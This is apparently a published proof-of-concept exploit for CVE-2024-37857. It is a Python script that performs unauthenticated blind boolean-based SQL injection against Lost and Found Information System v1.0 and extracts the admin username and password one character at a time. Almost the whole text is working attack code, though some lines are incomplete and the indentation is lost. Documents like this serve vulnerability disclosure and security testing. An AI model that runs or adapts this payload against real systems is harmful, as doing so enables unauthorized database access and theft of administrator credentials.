# Exploit Title: Unauthenticated Blind Boolean-Based SQL Injection Exploit - Lost and Found Information System   
# Exploit Author: Amit Roy (Rezur / AR0x7)  
# Date: June 07, 2024  
# Vendor Homepage:  
# Software Link:  
# Tested on: Kali Linux, Apache, Mysql  
# Version: v1.0  
# Exploit Description:  
# Lost and Found Information System v1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a Blind SQL Injection attack.  
# CVE : CVE-2024-37857  
import requests,string,sys,argparse  
r = requests.Session()  
proxies = {'http': ''}  
admin_path = "/php-lfis/admin/index.php"  
createCategory_path = "/php-lfis/classes/Master.php"  
def char_extract(rhost, payload):  
params = {"page": "categories/view_category", "id": payload}  
response = r.get(rhost+admin_path, params=params)  
if "Category ID is not valid" not in response.text:  
return True  
return False  
def sqli(rhost, column):  
charset = string.printable  
output_length = 200  
output = ""  
for i in range(output_length):  
for char in charset:  
# Extracts the credentials of user with id=1, admin by default  
payload = "13371337' or char(%s) = (select substring(%s,%s,1) from users where id=1)-- -" % (ord(str(char)),str(column),str(i+1))  
sys.stdout.write(f"\r[*] Extracting: {output}\r")  
if char_extract(rhost, payload):  
output += char  
elif char == '~' and not char_extract(rhost, payload):  
print("[*] Extracting:",output)  
return output  
def argsetup():  
about = 'Unauthenticated Blind Boolean-Based SQL Injection Exploit - Lost and Found Information System ('  
parser = argparse.ArgumentParser(description=about)  
parser.add_argument('-t', '--target', help='Target ip address or hostname. Example : "http://localhost"', required=True)  
args = parser.parse_args()  
return args  
def main():  
args = argsetup()  
rhost =  
print(sqli(rhost, 'username'),':',sqli(rhost, 'password'))  
if __name__ == "__main__":